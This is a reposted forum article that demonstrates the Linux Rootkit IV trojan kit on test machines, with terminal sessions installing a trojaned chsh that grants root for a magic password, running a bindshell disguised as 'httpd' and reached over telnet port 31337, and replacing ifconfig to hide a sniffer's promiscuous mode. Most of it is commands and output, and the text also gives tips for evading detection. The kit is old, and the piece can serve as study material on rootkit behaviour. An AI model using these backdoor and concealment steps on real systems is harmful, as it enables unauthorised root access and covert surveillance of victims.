[转载]Linux Rootkit Analyze IV
文章作者:Lord SomerLinux Rootkit IV is the newest version of a well-known trojan-package for Linux system. The rootkit comes with following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2
In this example I tested chsh, bindshell and ifconfig.
In the first example below, I compiled only chsh in /chsh-directory and used 'fix' to replace the original with the trojan version.
[root@parittaja chsh]# ls -al
total 201
drwxr--r-- 2 jj jj 1024 Mar 18 02:10 .
drwxr-xr-x 19 jj jj 1024 Mar 18 02:09 ..
-rw------- 1 jj jj 109 Nov 24 06:27 Makefile
-rwxr-xr-x 1 root dzeijay 185448 Mar 18 02:09 chsh
-rw------- 1 jj jj 8786 Nov 24 06:27 chsh.c
-rw------- 1 jj jj 5283 Nov 24 06:27 setpwnam.c
[root@parittaja chsh]# make
gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
-DVARPATH=\"\" chsh.c -o chsh.o
gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
-DVARPATH=\"\" setpwnam.c -o setpwnam.o
gcc -s -N chsh.o setpwnam.o -o chsh
[root@parittaja chsh]# ls -al
total 210
drwxr--r-- 2 jj jj 1024 Mar 18 02:10 .
drwxr-xr-x 19 jj jj 1024 Mar 18 02:09 ..
-rw------- 1 jj jj 109 Nov 24 06:27 Makefile
-rwxr-xr-x 1 root dzeijay 185448 Mar 18 02:10 chsh
-rw------- 1 jj jj 8786 Nov 24 06:27 chsh.c
-rw-r--r-- 1 root dzeijay 5544 Mar 18 02:10 chsh.o
-rw------- 1 jj jj 5283 Nov 24 06:27 setpwnam.c
-rw-r--r-- 1 root dzeijay 2488 Mar 18 02:10 setpwnam.o
[root@parittaja chsh]# ../fix /usr/bin/chsh ./chsh ../backup/chsh
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chsh fixed
[root@parittaja chsh]# ls -al /usr/bin/chsh
-rwsr-xr-x 1 root root 185448 Mar 18 02:08 /usr/bin/chsh
[root@parittaja chsh]# ls -al ../backup/chsh
-rwsr-xr-x 1 root dzeijay 9620 Mar 18 02:11 ../backup/chsh
[root@parittaja chsh]#
As can be noticed, the fixing wasn't all that successful, and the trojaned program would easily be caught because of it's huge size.
Later on, it is easy to get a root shell by typing the specific password.
[jj@rikas jj]$ id
uid=511(jj) gid=530(jj) groups=530(jj)
[jj@rikas jj]$ chsh
Changing shell for jj.
New shell [/bin/tcsh]: satori
[root@rikas jj]# id
uid=0(root) gid=0(root) groups=530(jj)
[root@rikas jj]# exit
exit
[jj@rikas jj]$
A problem with chsh (and chfn) is that the original system commands in the newer Linux systems asks for the user password before asking for a new shell etc. The trojaned versions in these rootkits won't do that and are therefore easily discovered. But, it wouldn't require very much to implement that, or better even to trojan the newer versions of chsh and chfn. This reminds of the system specific requirements of trojan programs. A trojan coder (and user naturally!) must know how the original command works exactly, otherwise they are immediately caught. This limit's the portability and distribution of existing trojans to those specific systems (platforms, kernel versions, distrubution and program versions etc) they were made to.
The second example is more sophisticated rootkit/trojan "attack" and utilizes the "bindshell" program that comes in Linux Rootkit IV. Bindshell "binds" itself to a specific port and remains waiting for new connections. When a connection is established (from the same computer or from somewhere else), you can type commands ending with a semicolon, and the bindshell executes them in the system with root-priviledges (if binded as root). Very handy.
In the example below, bindshell is first compiled and right owners are set. Then I renamed it to 'httpd' to make it harder to notice and finally put it running in the background. It would be wise to pick a process-name that is widely used in the system and relatively small (of course you could do the bindshell program exactly as big as some specific process) to make it as transparent as possible. These run-time programs are harder to track in large systems where there are lots of user processes running.
[root@parittaja lrk4]# make bindshell
gcc -O2 -fomit-frame-pointer -pipe -I/usr/include/bsd -include /usr/include/bsd/bsd.h
bindshell.c -lbsd -o bindshell
[root@parittaja lrk4]# chown root.root bindshell
[root@parittaja lrk4]# mv bindshell httpd
[root@parittaja lrk4]# ls -al httpd
-rwxr-xr-x 1 root root 5339 Mar 18 02:36 httpd
[root@parittaja lrk4]# httpd
[root@parittaja lrk4]# rm httpd
[root@parittaja lrk4]# ps aux | grep httpd
nobody 1378 0.0 1.6 1168 504 ? S Mar 14 0:00 httpd
nobody 1379 0.0 1.4 1168 436 ? S Mar 14 0:00 httpd
nobody 1380 0.0 1.3 1168 432 ? S Mar 14 0:00 httpd
nobody 1381 0.0 1.3 1168 416 ? S Mar 14 0:00 httpd
nobody 1382 0.0 1.3 1168 428 ? S Mar 14 0:00 httpd
root 319 0.0 1.1 1168 356 ? S Jan 5 0:00 httpd
root 18281 0.0 0.7 856 224 ? S 02:33 0:00 httpd
root 18518 0.0 1.1 968 340 p4 S 02:37 0:00 grep httpd
[root@parittaja lrk4]#
Now when the process is running, I can contact the victim computer from any other computer with telnet or likes and do what I wish with root-priviledges. Notice, that I don't even need a user account on the target machine - there's no login!
[jj@rikas jj]$ telnet parittaja 31337
Trying 10.0.0.61...
Connected to parittaja.sec.
Escape character is '^]'.
ls -al /root/private.txt;
-rw-r--r-- 1 root root 0 Mar 18 02:30 /root/private.txt
: command not found
rm -f /root/private.txt;
: command not found
ls -al /root/private.txt;
ls: /root/private.txt: No such file or directory
: command not found
exit;
Connection closed by foreign host.
[jj@rikas jj]$
As an example of those not-rootshell-giving-programs, let's take a look at 'ifconfig'. Ifconfig is a general interface configuration tool for many purposes. You can set up your interface or check it's current status. One classical feature of ifconfig is that it shows you if an ethernet network card attached to the system is in so called 'promiscous mode'. That would indicate, that somebody is sniffering the net-traffic flowing by the card. If the sniffering is of malicious intension, it would be preferrable to do it in silence. One solution is to trojan ifconfig.
[root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1
RX packets:38794 errors:0 dropped:0 overruns:0 frame:0
TX packets:38794 errors:0 dropped:0 overruns:0 carrier:0
collisions:0
eth0 Link encap:Ethernet HWaddr 00:10:5A:3B:3C:0E
inet addr:10.0.0.81 Bcast:10.0.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:3464563 errors:0 dropped:0 overruns:0 frame:0
TX packets:260648 errors:0 dropped:0 overruns:0 carrier:12
collisions:3099
Interrupt:10 Base address:0xb800
[root@rikas net-tools-1.32-alpha]#
Ifconfig shows that the ethernet is running in promiscous mode. So let's replace it with a trojaned version (compiled earlier, comes with Linux Rootkit IV).
[root@rikas net-tools-1.32-alpha]# ../fix /sbin/ifconfig ./ifconfig ../backup/ifconfig
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /sbin/ifconfig fixed
[root@rikas net-tools-1.32-alpha]# ls -al /sbin/ifconfig
-rwxr-xr-x 1 root root 19840 maalis 17 23:33 /sbin/ifconfig
[root@rikas net-tools-1.32-alpha]# ls -al ../backup/ifconfig
-rwxr-xr-x 1 root dzeijay 25596 maalis 18 03:19 ../backup/ifconfig
[root@rikas net-tools-1.32-alpha]#
Now let's check again...
[root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1
RX packets:38795 errors:0 dropped:0 overruns:0
TX packets:38795 errors:0 dropped:0 overruns:0
eth0 Link encap:10Mbps Ethernet HWaddr 00:10:5A:3B:3C:0E
inet addr:10.0.0.81 Bcast:10.0.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3464854 errors:0 dropped:0 overruns:0
TX packets:260910 errors:0 dropped:0 overruns:0
Interrupt:10 Base address:0xb800
[root@rikas net-tools-1.32-alpha]#
...and the 'PROMISC' is gone.
Linux Rootkit IV compiles fine on an old RedHat 4.2 (libc5), but requires modifications for newer systems.
Fear...your system may be trojaned...
页:
[1]